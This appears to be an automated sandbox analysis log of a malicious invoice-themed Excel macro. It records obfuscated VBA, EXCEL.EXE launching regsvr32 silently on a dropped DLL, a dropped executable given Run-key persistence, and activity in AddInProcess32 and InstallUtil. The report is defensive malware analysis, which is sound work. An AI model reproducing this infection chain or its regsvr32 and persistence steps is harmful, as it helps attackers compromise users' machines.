Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Automated click: Continue

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source:	Binary string: System.Windows.Forms.pdb source: AddInProcess32.exe, 0000000A.00000002.6561961431.0000000006647000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6560823931.000000000652B000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6558369408.0000000005FF7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: AddInProcess32.pdb source: AddInProcess32.exe, 0000000A.00000002.6561961431.0000000006647000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6560823931.000000000652B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdbt source: AddInProcess32.exe, 0000000A.00000002.6561961431.0000000006647000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6560823931.000000000652B000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6558369408.0000000005FF7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: InstallUtil.exe, 0000001E.00000002.6558369408.0000000005FF9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 0000000A.00000002.6561961431.0000000006647000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6560823931.000000000652B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.pdb source: InstallUtil.exe, 0000001E.00000002.6558369408.0000000005FF9000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Document contains an embedded VBA with many string operations indicating source code obfuscation

Source: PO202503S.xlsm	Stream path 'VBA/Module2' : High number of string operations
Source: VBA code instrumentation	OLE, VBA macro, High number of string operations: Module Module2			Name: Module2

Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe

Code function: 6_2_00007FF767D98700 GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,

6_2_00007FF767D98700

Source: libcares-2.dll.3.dr	Static PE information: section name: _RDATA
Source: msvcp290.dll.3.dr	Static PE information: section name: _RDATA
Source: PO202502SNAKWS.exe.3.dr	Static PE information: section name: .xdata
Source: libcares-2.dll.6.dr	Static PE information: section name: _RDATA
Source: msvcp290.dll.6.dr	Static PE information: section name: _RDATA
Source: PO202502SNAKWS.exe.6.dr	Static PE information: section name: .xdata

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s "C:\Users\user\AppData\Local\Temp\invoice_temp\vcruntime210.dll"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFCAFF8D2A5 pushad ; iretd	8_2_00007FFCAFF8D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFCB00ABCBD push E85B3ED4h; ret	8_2_00007FFCB00ABDF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFCB00ABBFB push E85B3ED4h; ret	8_2_00007FFCB00ABDF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_0170E0DC push EC01688Bh; ret	10_2_0170E0E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_017347A8 pushad ; ret	10_2_017347A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B3CAD1 push ss; iretd	10_2_06B3CAD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06B3890D push es; ret	10_2_06B38920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_06D0A75C push es; ret	10_2_06D0BF80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_08BA0006 push es; iretd	10_2_08BA003C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_08BA9078 push esp; retf	10_2_08BA9085
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 10_2_08BA6DA9 push eax; iretd	10_2_08BA6DB5

Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	File created: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Jump to dropped file
Source: C:\Program Files\7-Zip\7z.exe	File created: C:\Users\user\AppData\Local\Temp\invoice_temp\msvcp290.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	File created: C:\Users\user\SystemRootDoc\msvcp290.dll	Jump to dropped file
Source: C:\Program Files\7-Zip\7z.exe	File created: C:\Users\user\AppData\Local\Temp\invoice_temp\libcares-2.dll	Jump to dropped file
Source: C:\Program Files\7-Zip\7z.exe	File created: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	File created: C:\Users\user\SystemRootDoc\libcares-2.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PO202502SNAKWS			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PO202502SNAKWS			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe

Code function: 6_2_00007FFD101FF680 __acrt_iob_func,abort,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,__acrt_iob_func,abort,__acrt_iob_func,abort,__acrt_iob_func,abort,GetLastError,__acrt_iob_func,abort,GetLastError,__acrt_iob_func,abort,GetLastError,__acrt_iob_func,abort,GetLastError,__acrt_iob_func,abort,GetLastError,__acrt_iob_func,abort,GetLastError,__acrt_iob_func,abort,GetLastError,__acrt_iob_func,abort,GetLastError,__acrt_iob_func,abort,GetLastError,__acrt_iob_func,abort,GetLastError,__acrt_iob_func,abort,GetLastError,__acrt_iob_func,abort,GetLastError,__acrt_iob_func,abort,GetLastError,__acrt_iob_func,abort,GetLastError,__acrt_iob_func,abort,GetLastError,__acrt_iob_func,abort,GetLastError,__acrt_iob_func,abort,GetLastError,__acrt_iob_func,abort,GetLastError,__acrt_iob_func,abort,GetLastError,__acrt_iob_func,abort,GetLastError,__acrt_iob_func,abort,GetLastError,__acrt_iob_func,abort,GetLastError,__acrt_iob_func,abort,GetLastError,__acrt_iob_func,abort,GetLastError,__acrt_iob_func,abort,GetLastError,__acrt_iob_func,abort,GetLastError,__acrt_iob_func,abort,GetLastError,__acrt_iob_func,abort,GetLastError,__acrt_iob_func,abort,GetLastError,__acrt_iob_func,abort,GetLastError,__acrt_iob_func,abort,GetLastError,__acrt_iob_func,abort,GetLastError,__acrt_iob_func,abort,GetLastError,__acrt_iob_func,abort,GetLastError,__acrt_iob_func,abort,GetLastError,__acrt_iob_func,abort,G

6_2_00007FFD101FF680

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
